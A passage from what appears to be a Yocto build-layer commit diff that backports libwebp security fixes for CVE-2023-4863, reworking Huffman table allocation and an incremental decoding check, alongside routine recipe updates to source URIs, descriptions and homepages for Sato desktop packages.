+- if (!VP8LBuildHuffmanTable(table, LENGTHS_TABLE_BITS,
+- code_length_code_lengths,
+- NUM_CODE_LENGTH_CODES)) {
++ if (!VP8LHuffmanTablesAllocate(1 << LENGTHS_TABLE_BITS, &tables) ||
++ !VP8LBuildHuffmanTable(&tables, LENGTHS_TABLE_BITS,
++ code_length_code_lengths, NUM_CODE_LENGTH_CODES)) {
+ goto End;
+ }
+
+@@ -277,7 +277,7 @@ static int ReadHuffmanCodeLengths(
+ int code_len;
+ if (max_symbol-- == 0) break;
+ VP8LFillBitWindow(br);
+- p = &table[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
++ p = &tables.curr_segment->start[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
+ VP8LSetBitPos(br, br->bit_pos_ + p->bits);
+ code_len = p->value;
+ if (code_len < kCodeLengthLiterals) {
+@@ -300,6 +300,7 @@ static int ReadHuffmanCodeLengths(
+ ok = 1;
+
+ End:
++ VP8LHuffmanTablesDeallocate(&tables);
+ if (!ok) dec->status_ = VP8_STATUS_BITSTREAM_ERROR;
+ return ok;
+ }
+@@ -307,7 +308,8 @@ static int ReadHuffmanCodeLengths(
+ // 'code_lengths' is pre-allocated temporary buffer, used for creating Huffman
+ // tree.
+ static int ReadHuffmanCode(int alphabet_size, VP8LDecoder* const dec,
+- int* const code_lengths, HuffmanCode* const table) {
++ int* const code_lengths,
++ HuffmanTables* const table) {
+ int ok = 0;
+ int size = 0;
+ VP8LBitReader* const br = &dec->br_;
+@@ -362,8 +364,7 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ VP8LMetadata* const hdr = &dec->hdr_;
+ uint32_t* huffman_image = NULL;
+ HTreeGroup* htree_groups = NULL;
+- HuffmanCode* huffman_tables = NULL;
+- HuffmanCode* huffman_table = NULL;
++ HuffmanTables* huffman_tables = &hdr->huffman_tables_;
+ int num_htree_groups = 1;
+ int num_htree_groups_max = 1;
+ int max_alphabet_size = 0;
+@@ -372,6 +373,10 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ int* mapping = NULL;
+ int ok = 0;
+
++ // Check the table has been 0 initialized (through InitMetadata).
++ assert(huffman_tables->root.start == NULL);
++ assert(huffman_tables->curr_segment == NULL);
++
+ if (allow_recursion && VP8LReadBits(br, 1)) {
+ // use meta Huffman codes.
+ const int huffman_precision = VP8LReadBits(br, 3) + 2;
+@@ -434,16 +439,15 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+
+ code_lengths = (int*)WebPSafeCalloc((uint64_t)max_alphabet_size,
+ sizeof(*code_lengths));
+- huffman_tables = (HuffmanCode*)WebPSafeMalloc(num_htree_groups * table_size,
+- sizeof(*huffman_tables));
+ htree_groups = VP8LHtreeGroupsNew(num_htree_groups);
+
+- if (htree_groups == NULL || code_lengths == NULL || huffman_tables == NULL) {
++ if (htree_groups == NULL || code_lengths == NULL ||
++ !VP8LHuffmanTablesAllocate(num_htree_groups * table_size,
++ huffman_tables)) {
+ dec->status_ = VP8_STATUS_OUT_OF_MEMORY;
+ goto Error;
+ }
+
+- huffman_table = huffman_tables;
+ for (i = 0; i < num_htree_groups_max; ++i) {
+ // If the index "i" is unused in the Huffman image, just make sure the
+ // coefficients are valid but do not store them.
+@@ -468,19 +472,20 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ int max_bits = 0;
+ for (j = 0; j < HUFFMAN_CODES_PER_META_CODE; ++j) {
+ int alphabet_size = kAlphabetSize[j];
+- htrees[j] = huffman_table;
+ if (j == 0 && color_cache_bits > 0) {
+ alphabet_size += (1 << color_cache_bits);
+ }
+- size = ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_table);
++ size =
++ ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_tables);
++ htrees[j] = huffman_tables->curr_segment->curr_table;
+ if (size == 0) {
+ goto Error;
+ }
+ if (is_trivial_literal && kLiteralMap[j] == 1) {
+- is_trivial_literal = (huffman_table->bits == 0);
++ is_trivial_literal = (htrees[j]->bits == 0);
+ }
+- total_size += huffman_table->bits;
+- huffman_table += size;
++ total_size += htrees[j]->bits;
++ huffman_tables->curr_segment->curr_table += size;
+ if (j <= ALPHA) {
+ int local_max_bits = code_lengths[0];
+ int k;
+@@ -515,14 +520,13 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ hdr->huffman_image_ = huffman_image;
+ hdr->num_htree_groups_ = num_htree_groups;
+ hdr->htree_groups_ = htree_groups;
+- hdr->huffman_tables_ = huffman_tables;
+
+ Error:
+ WebPSafeFree(code_lengths);
+ WebPSafeFree(mapping);
+ if (!ok) {
+ WebPSafeFree(huffman_image);
+- WebPSafeFree(huffman_tables);
++ VP8LHuffmanTablesDeallocate(huffman_tables);
+ VP8LHtreeGroupsFree(htree_groups);
+ }
+ return ok;
+@@ -1354,7 +1358,7 @@ static void ClearMetadata(VP8LMetadata* const hdr) {
+ assert(hdr != NULL);
+
+ WebPSafeFree(hdr->huffman_image_);
+- WebPSafeFree(hdr->huffman_tables_);
++ VP8LHuffmanTablesDeallocate(&hdr->huffman_tables_);
+ VP8LHtreeGroupsFree(hdr->htree_groups_);
+ VP8LColorCacheClear(&hdr->color_cache_);
+ VP8LColorCacheClear(&hdr->saved_color_cache_);
+@@ -1670,7 +1674,7 @@ int VP8LDecodeImage(VP8LDecoder* const dec) {
+ // Sanity checks.
+ if (dec == NULL) return 0;
+
+- assert(dec->hdr_.huffman_tables_ != NULL);
++ assert(dec->hdr_.huffman_tables_.root.start != NULL);
+ assert(dec->hdr_.htree_groups_ != NULL);
+ assert(dec->hdr_.num_htree_groups_ > 0);
+
+diff --git a/src/dec/vp8li_dec.h b/src/dec/vp8li_dec.h
+index 72b2e86..32540a4 100644
+--- a/src/dec/vp8li_dec.h
++++ b/src/dec/vp8li_dec.h
+@@ -51,7 +51,7 @@ typedef struct {
+ uint32_t* huffman_image_;
+ int num_htree_groups_;
+ HTreeGroup* htree_groups_;
+- HuffmanCode* huffman_tables_;
++ HuffmanTables huffman_tables_;
+ } VP8LMetadata;
+
+ typedef struct VP8LDecoder VP8LDecoder;
+diff --git a/src/utils/huffman_utils.c b/src/utils/huffman_utils.c
+index 0cba0fb..9efd628 100644
+--- a/src/utils/huffman_utils.c
++++ b/src/utils/huffman_utils.c
+@@ -177,21 +177,24 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+ if (num_open < 0) {
+ return 0;
+ }
+- if (root_table == NULL) continue;
+ for (; count[len] > 0; --count[len]) {
+ HuffmanCode code;
+ if ((key & mask) != low) {
+- table += table_size;
++ if (root_table != NULL) table += table_size;
+ table_bits = NextTableBitSize(count, len, root_bits);
+ table_size = 1 << table_bits;
+ total_size += table_size;
+ low = key & mask;
+- root_table[low].bits = (uint8_t)(table_bits + root_bits);
+- root_table[low].value = (uint16_t)((table - root_table) - low);
++ if (root_table != NULL) {
++ root_table[low].bits = (uint8_t)(table_bits + root_bits);
++ root_table[low].value = (uint16_t)((table - root_table) - low);
++ }
++ }
++ if (root_table != NULL) {
++ code.bits = (uint8_t)(len - root_bits);
++ code.value = (uint16_t)sorted[symbol++];
++ ReplicateValue(&table[key >> root_bits], step, table_size, code);
+ }
+- code.bits = (uint8_t)(len - root_bits);
+- code.value = (uint16_t)sorted[symbol++];
+- ReplicateValue(&table[key >> root_bits], step, table_size, code);
+ key = GetNextKey(key, len);
+ }
+ }
+@@ -211,25 +214,83 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+ ((1 << MAX_CACHE_BITS) + NUM_LITERAL_CODES + NUM_LENGTH_CODES)
+ // Cut-off value for switching between heap and stack allocation.
+ #define SORTED_SIZE_CUTOFF 512
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+ const int code_lengths[], int code_lengths_size) {
+- int total_size;
++ const int total_size =
++ BuildHuffmanTable(NULL, root_bits, code_lengths, code_lengths_size, NULL);
+ assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE);
+- if (root_table == NULL) {
+- total_size = BuildHuffmanTable(NULL, root_bits,
+- code_lengths, code_lengths_size, NULL);
+- } else if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
++ if (total_size == 0 || root_table == NULL) return total_size;
++
++ if (root_table->curr_segment->curr_table + total_size >=
++ root_table->curr_segment->start + root_table->curr_segment->size) {
++ // If 'root_table' does not have enough memory, allocate a new segment.
++ // The available part of root_table->curr_segment is left unused because we
++ // need a contiguous buffer.
++ const int segment_size = root_table->curr_segment->size;
++ struct HuffmanTablesSegment* next =
++ (HuffmanTablesSegment*)WebPSafeMalloc(1, sizeof(*next));
++ if (next == NULL) return 0;
++ // Fill the new segment.
++ // We need at least 'total_size' but if that value is small, it is better to
++ // allocate a big chunk to prevent more allocations later. 'segment_size' is
++ // therefore chosen (any other arbitrary value could be chosen).
++ next->size = total_size > segment_size ? total_size : segment_size;
++ next->start =
++ (HuffmanCode*)WebPSafeMalloc(next->size, sizeof(*next->start));
++ if (next->start == NULL) {
++ WebPSafeFree(next);
++ return 0;
++ }
++ next->curr_table = next->start;
++ next->next = NULL;
++ // Point to the new segment.
++ root_table->curr_segment->next = next;
++ root_table->curr_segment = next;
++ }
++ if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
+ // use local stack-allocated array.
+ uint16_t sorted[SORTED_SIZE_CUTOFF];
+- total_size = BuildHuffmanTable(root_table, root_bits,
+- code_lengths, code_lengths_size, sorted);
+- } else { // rare case. Use heap allocation.
++ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++ code_lengths, code_lengths_size, sorted);
++ } else { // rare case. Use heap allocation.
+ uint16_t* const sorted =
+ (uint16_t*)WebPSafeMalloc(code_lengths_size, sizeof(*sorted));
+ if (sorted == NULL) return 0;
+- total_size = BuildHuffmanTable(root_table, root_bits,
+- code_lengths, code_lengths_size, sorted);
++ BuildHuffmanTable(root_table->curr_segment->curr_table, root_bits,
++ code_lengths, code_lengths_size, sorted);
+ WebPSafeFree(sorted);
+ }
+ return total_size;
+ }
++
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables) {
++ // Have 'segment' point to the first segment for now, 'root'.
++ HuffmanTablesSegment* const root = &huffman_tables->root;
++ huffman_tables->curr_segment = root;
++ // Allocate root.
++ root->start = (HuffmanCode*)WebPSafeMalloc(size, sizeof(*root->start));
++ if (root->start == NULL) return 0;
++ root->curr_table = root->start;
++ root->next = NULL;
++ root->size = size;
++ return 1;
++}
++
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables) {
++ HuffmanTablesSegment *current, *next;
++ if (huffman_tables == NULL) return;
++ // Free the root node.
++ current = &huffman_tables->root;
++ next = current->next;
++ WebPSafeFree(current->start);
++ current->start = NULL;
++ current->next = NULL;
++ current = next;
++ // Free the following nodes.
++ while (current != NULL) {
++ next = current->next;
++ WebPSafeFree(current->start);
++ WebPSafeFree(current);
++ current = next;
++ }
++}
+diff --git a/src/utils/huffman_utils.h b/src/utils/huffman_utils.h
+index 13b7ad1..98415c5 100644
+--- a/src/utils/huffman_utils.h
++++ b/src/utils/huffman_utils.h
+@@ -43,6 +43,29 @@ typedef struct {
+ // or non-literal symbol otherwise
+ } HuffmanCode32;
+
++// Contiguous memory segment of HuffmanCodes.
++typedef struct HuffmanTablesSegment {
++ HuffmanCode* start;
++ // Pointer to where we are writing into the segment. Starts at 'start' and
++ // cannot go beyond 'start' + 'size'.
++ HuffmanCode* curr_table;
++ // Pointer to the next segment in the chain.
++ struct HuffmanTablesSegment* next;
++ int size;
++} HuffmanTablesSegment;
++
++// Chained memory segments of HuffmanCodes.
++typedef struct HuffmanTables {
++ HuffmanTablesSegment root;
++ // Currently processed segment. At first, this is 'root'.
++ HuffmanTablesSegment* curr_segment;
++} HuffmanTables;
++
++// Allocates a HuffmanTables with 'size' contiguous HuffmanCodes. Returns 0 on
++// memory allocation error, 1 otherwise.
++int VP8LHuffmanTablesAllocate(int size, HuffmanTables* huffman_tables);
++void VP8LHuffmanTablesDeallocate(HuffmanTables* const huffman_tables);
++
+ #define HUFFMAN_PACKED_BITS 6
+ #define HUFFMAN_PACKED_TABLE_SIZE (1u << HUFFMAN_PACKED_BITS)
+
+@@ -78,9 +101,7 @@ void VP8LHtreeGroupsFree(HTreeGroup* const htree_groups);
+ // the huffman table.
+ // Returns built table size or 0 in case of error (invalid tree or
+ // memory error).
+-// If root_table is NULL, it returns 0 if a lookup cannot be built, something
+-// > 0 otherwise (but not the table size).
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+ const int code_lengths[], int code_lengths_size);
+
+ #ifdef __cplusplus
+--
+2.40.0
+
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
new file mode 100644
index 0000000000..c1eedb6100
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch
@@ -0,0 +1,53 @@
+From 95ea5226c870449522240ccff26f0b006037c520 Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Mon, 11 Sep 2023 16:06:08 +0200
+Subject: [PATCH 2/2] Fix invalid incremental decoding check.
+
+The first condition is only necessary if we have not read enough
+(enough being defined by src_last, not src_end which is the end
+of the image).
+The second condition now fits the comment below: "if not
+incremental, and we are past the end of buffer".
+
+BUG=oss-fuzz:62136
+
+Change-Id: I0700f67c62db8e1c02c2e429a069a71e606a5e4f
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/95ea5226c870449522240ccff26f0b006037c520]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 15 +++++++++++++--
+ 1 file changed, 13 insertions(+), 2 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 0d38314..684a5b6 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -1237,9 +1237,20 @@ static int DecodeImageData(VP8LDecoder* const dec, uint32_t* const data,
+ }
+
+ br->eos_ = VP8LIsEndOfStream(br);
+- if (dec->incremental_ && br->eos_ && src < src_end) {
++ // In incremental decoding:
++ // br->eos_ && src < src_last: if 'br' reached the end of the buffer and
++ // 'src_last' has not been reached yet, there is not enough data. 'dec' has to
++ // be reset until there is more data.
++ // !br->eos_ && src < src_last: this cannot happen as either the buffer is
++ // fully read, either enough has been read to reach 'src_last'.
++ // src >= src_last: 'src_last' is reached, all is fine. 'src' can actually go
++ // beyond 'src_last' in case the image is cropped and an LZ77 goes further.
++ // The buffer might have been enough or there is some left. 'br->eos_' does
++ // not matter.
++ assert(!dec->incremental_ || (br->eos_ && src < src_last) || src >= src_last);
++ if (dec->incremental_ && br->eos_ && src < src_last) {
+ RestoreState(dec);
+- } else if (!br->eos_) {
++ } else if ((dec->incremental_ && src >= src_last) || !br->eos_) {
+ // Process the remaining rows corresponding to last row-block.
+ if (process_func != NULL) {
+ process_func(dec, row > last_row ? last_row : row);
+--
+2.40.0
diff --git a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
index 68e5ae2b3c..88c36cb76c 100644
--- a/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
+++ b/meta/recipes-multimedia/webp/libwebp_1.1.0.bb
@@ -19,6 +19,12 @@ SRC_URI[sha256sum] = "98a052268cc4d5ece27f76572a7f50293f439c17a98e67c4ea0c7ed6f5
UPSTREAM_CHECK_URI = "http://downloads.webmproject.org/releases/webp/index.html"
+SRC_URI += " \
+ file://CVE-2023-1999.patch \
+ file://CVE-2023-4863-0001.patch \
+ file://CVE-2023-4863-0002.patch \
+"
+
EXTRA_OECONF = " \
--disable-wic \
--enable-libwebpmux \
diff --git a/meta/recipes-multimedia/x264/x264_git.bb b/meta/recipes-multimedia/x264/x264_git.bb
index 39429a8809..6789646833 100644
--- a/meta/recipes-multimedia/x264/x264_git.bb
+++ b/meta/recipes-multimedia/x264/x264_git.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
DEPENDS = "nasm-native"
-SRC_URI = "git://github.com/mirror/x264;branch=stable \
+SRC_URI = "git://github.com/mirror/x264;branch=stable;protocol=https \
file://don-t-default-to-cortex-a9-with-neon.patch \
file://Fix-X32-build-by-disabling-asm.patch \
"
diff --git a/meta/recipes-rt/rt-tests/rt-tests.inc b/meta/recipes-rt/rt-tests/rt-tests.inc
index 3ac39d90c3..29ebe2d361 100644
--- a/meta/recipes-rt/rt-tests/rt-tests.inc
+++ b/meta/recipes-rt/rt-tests/rt-tests.inc
@@ -2,7 +2,7 @@
SRCREV = "dff174f994f547a5785d32454865f140daacb0f5"
PE = "1"
-SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git"
+SRC_URI = "git://git.kernel.org/pub/scm/utils/rt-tests/rt-tests.git;branch=main"
# 1.2 to 1.5 seem to be development versions
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>(?!1\.[2-6])(\d+(\.\d+)+))"
diff --git a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
index dad252b4ed..1db86b5067 100644
--- a/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
+++ b/meta/recipes-rt/rt-tests/rt-tests_1.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Real-Time preemption testcases"
-HOMEPAGE = "https://rt.wiki.kernel.org/index.php/Cyclictest"
+HOMEPAGE = "https://wiki.linuxfoundation.org/realtime/documentation/start"
+DESCRIPTION = "The main aim of the PREEMPT_RT patch is to minimize the amount of kernel code that is non-preemptible Therefore several substitution mechanisms and new mechanisms are implemented."
SECTION = "tests"
DEPENDS = "linux-libc-headers virtual/libc"
LICENSE = "GPLv2 & GPLv2+"
diff --git a/meta/recipes-sato/images/core-image-sato-dev.bb b/meta/recipes-sato/images/core-image-sato-dev.bb
index 7fa69d0997..f45a83273c 100644
--- a/meta/recipes-sato/images/core-image-sato-dev.bb
+++ b/meta/recipes-sato/images/core-image-sato-dev.bb
@@ -3,5 +3,6 @@ require core-image-sato.bb
DESCRIPTION = "Image with Sato for development work. It includes everything \
within core-image-sato plus a native toolchain, application development and \
testing libraries, profiling and debug symbols."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "dev-pkgs"
diff --git a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
index 3641217306..d37ad00cf8 100644
--- a/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
+++ b/meta/recipes-sato/images/core-image-sato-ptest-fast.bb
@@ -1,9 +1,13 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
require core-image-sato-sdk.bb
require conf/distro/include/ptest-packagelists.inc
IMAGE_INSTALL += "${PTESTS_FAST}"
DESCRIPTION += "Also includes ptest packages with fast execution times to allow for more automated QA."
+HOMEPAGE = "https://www.yoctoproject.org/"
# This image is sufficiently large (~1.8GB) that it can't actually fit in a live
# image (which has a 4GB limit), so nullify the overhead factor (1.3x out of the
diff --git a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
index bf749acd79..eea89a5d6c 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk-ptest.bb
@@ -1,7 +1,11 @@
+inherit features_check
+REQUIRED_DISTRO_FEATURES = "ptest"
+
require core-image-sato-sdk.bb
require conf/distro/include/ptest-packagelists.inc
DESCRIPTION += "Also includes ptest packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
PROVIDES += "core-image-sato-ptest"
diff --git a/meta/recipes-sato/images/core-image-sato-sdk.bb b/meta/recipes-sato/images/core-image-sato-sdk.bb
index d7cc52b52b..b52de0def0 100644
--- a/meta/recipes-sato/images/core-image-sato-sdk.bb
+++ b/meta/recipes-sato/images/core-image-sato-sdk.bb
@@ -3,6 +3,7 @@ require core-image-sato.bb
DESCRIPTION = "Image with Sato support that includes everything within \
core-image-sato plus meta-toolchain, development headers and libraries to \
form a standalone SDK."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "dev-pkgs tools-sdk \
tools-debug eclipse-debug tools-profile tools-testapps debug-tweaks ssh-server-openssh"
diff --git a/meta/recipes-sato/images/core-image-sato.bb b/meta/recipes-sato/images/core-image-sato.bb
index 673106eb6d..300d8e0d43 100644
--- a/meta/recipes-sato/images/core-image-sato.bb
+++ b/meta/recipes-sato/images/core-image-sato.bb
@@ -1,6 +1,7 @@
DESCRIPTION = "Image with Sato, a mobile environment and visual style for \
mobile devices. The image supports X11 with a Sato theme, Pimlico \
applications, and contains terminal, editor, and file manager."
+HOMEPAGE = "https://www.yoctoproject.org/"
IMAGE_FEATURES += "splash package-management x11-base x11-sato ssh-server-dropbear hwcodecs"
@@ -12,4 +13,5 @@ TOOLCHAIN_HOST_TASK_append = " nativesdk-intltool nativesdk-glib-2.0"
TOOLCHAIN_HOST_TASK_remove_task-populate-sdk-ext = " nativesdk-intltool nativesdk-glib-2.0"
QB_MEM = '${@bb.utils.contains("DISTRO_FEATURES", "opengl", "-m 512", "-m 256", d)}'
+QB_MEM_qemuarmv5 = "-m 256"
QB_MEM_qemumips = "-m 256"
diff --git a/meta/recipes-sato/l3afpad/l3afpad_git.bb b/meta/recipes-sato/l3afpad/l3afpad_git.bb
index 6fdcc3e392..4d5d299d47 100644
--- a/meta/recipes-sato/l3afpad/l3afpad_git.bb
+++ b/meta/recipes-sato/l3afpad/l3afpad_git.bb
@@ -1,4 +1,8 @@
SUMMARY = "Simple GTK+ Text Editor"
+DESCRIPTION = "L3afpad is a simple GTK+ text editor that emphasizes simplicity. As development \
+focuses on keeping weight down to a minimum, only the most essential features \
+are implemented in the editor. L3afpad is simple to use, is easily compiled, \
+requires few libraries, and starts up quickly."
HOMEPAGE = "https://github.com/stevenhoneyman/l3afpad"
# Note that COPYING seems to mistakenly contain LGPLv2.1.
@@ -12,7 +16,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
DEPENDS = "gtk+3 intltool-native gettext-native"
PV = "0.8.18.1.11+git${SRCPV}"
-SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git"
+SRC_URI = "git://github.com/stevenhoneyman/l3afpad.git;branch=master;protocol=https"
SRCREV ="3cdccdc9505643e50f8208171d9eee5de11a42ff"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
index 547e851c15..5733a36b12 100644
--- a/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
+++ b/meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb
@@ -11,7 +11,7 @@ RDEPENDS_${PN} = "settings-daemon"
# SRCREV tagged 0.2
SRCREV = "ef2192ce98d9374ffdad5f78544c3f8f353c16aa"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://no-handed.patch"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
diff --git a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
index 5c23e85202..2a2eb24f57 100644
--- a/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
+++ b/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "Matchbox Window Manager Desktop"
+DESCRIPTION = "A lightweight windows manager for embedded systems. It uses the desktop background to provide an application launcher and allows modules to be loaded for additional functionality."
HOMEPAGE = "http://matchbox-project.org/"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
@@ -12,7 +13,7 @@ SECTION = "x11/wm"
# SRCREV tagged 2.2
SRCREV = "6bc67d09da4147e5552fe30011a05a2c59d2f777"
-SRC_URI = "git://git.yoctoproject.org/${BPN}-2 \
+SRC_URI = "git://git.yoctoproject.org/${BPN}-2;branch=master \
file://vfolders/* \
"
diff --git a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
index dfc7fbad57..49e37bd77c 100644
--- a/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
+++ b/meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Matchbox virtual keyboard for X11"
+DESCRIPTION = "An on screen 'virtual' or 'software' keyboard."
HOMEPAGE = "http://matchbox-project.org"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
SECTION = "x11"
diff --git a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
index 2e6f5b7085..54fe578cd3 100644
--- a/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
+++ b/meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb
@@ -1,4 +1,6 @@
SUMMARY = "Simple GTK+ based panel for handheld devices"
+DESCRIPTION = "A flexible always present 'window bar' for holding application \
+launchers and small 'applet' style applications"
HOMEPAGE = "http://matchbox-project.org"
BUGTRACKER = "http://bugzilla.yoctoproject.org/"
@@ -21,7 +23,7 @@ RPROVIDES_${PN} = "matchbox-panel"
RREPLACES_${PN} = "matchbox-panel"
RCONFLICTS_${PN} = "matchbox-panel"
-SRC_URI = "git://git.yoctoproject.org/${BPN} \
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \
file://0001-applets-systray-Allow-icons-to-be-smaller.patch \
"
diff --git a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
index 9f00281dde..e2e81c2905 100644
--- a/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
+++ b/meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb
@@ -11,7 +11,7 @@ SECTION = "x11/utils"
#SRCREV tagged 0.2
SRCREV = "161276d0f5d1be8187010fd0d9581a6feca70ea5"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
index 7a043d3447..bc4024736f 100644
--- a/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
+++ b/meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb
@@ -2,7 +2,7 @@ require matchbox-theme-sato.inc
# SRCREV tagged 0.2
SRCREV = "df085ba9cdaeaf2956890b0e29d7ea1779bf6c78"
-SRC_URI = "git://git.yoctoproject.org/matchbox-sato"
+SRC_URI = "git://git.yoctoproject.org/matchbox-sato;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
index ed3f1a69a1..25725e078d 100644
--- a/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
+++ b/meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb
@@ -3,6 +3,8 @@
#
SUMMARY = "Sato desktop"
+DESCRIPTION = "Packagegroups provide a convenient mechanism of bundling a collection of packages."
+HOMEPAGE = "https://www.yoctoproject.org/"
PR = "r33"
PACKAGE_ARCH = "${MACHINE_ARCH}"
diff --git a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
index 7885e0abae..153fbeb0b7 100644
--- a/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
+++ b/meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Fast lightweight tabbed filemanager"
+DESCRIPTION = "A free file manager application and the standard file manager of LXDE."
HOMEPAGE = "http://pcmanfm.sourceforge.net/"
LICENSE = "GPLv2 & GPLv2+ & LGPLv2.1+"
diff --git a/meta/recipes-sato/puzzles/puzzles_git.bb b/meta/recipes-sato/puzzles/puzzles_git.bb
index 41b78d6fe1..3ee441998d 100644
--- a/meta/recipes-sato/puzzles/puzzles_git.bb
+++ b/meta/recipes-sato/puzzles/puzzles_git.bb
@@ -1,4 +1,5 @@
SUMMARY = "Simon Tatham's Portable Puzzle Collection"
+DESCRIPTION = "Collection of small computer programs which implement one-player puzzle games."
HOMEPAGE = "http://www.chiark.greenend.org.uk/~sgtatham/puzzles/"
LICENSE = "MIT"
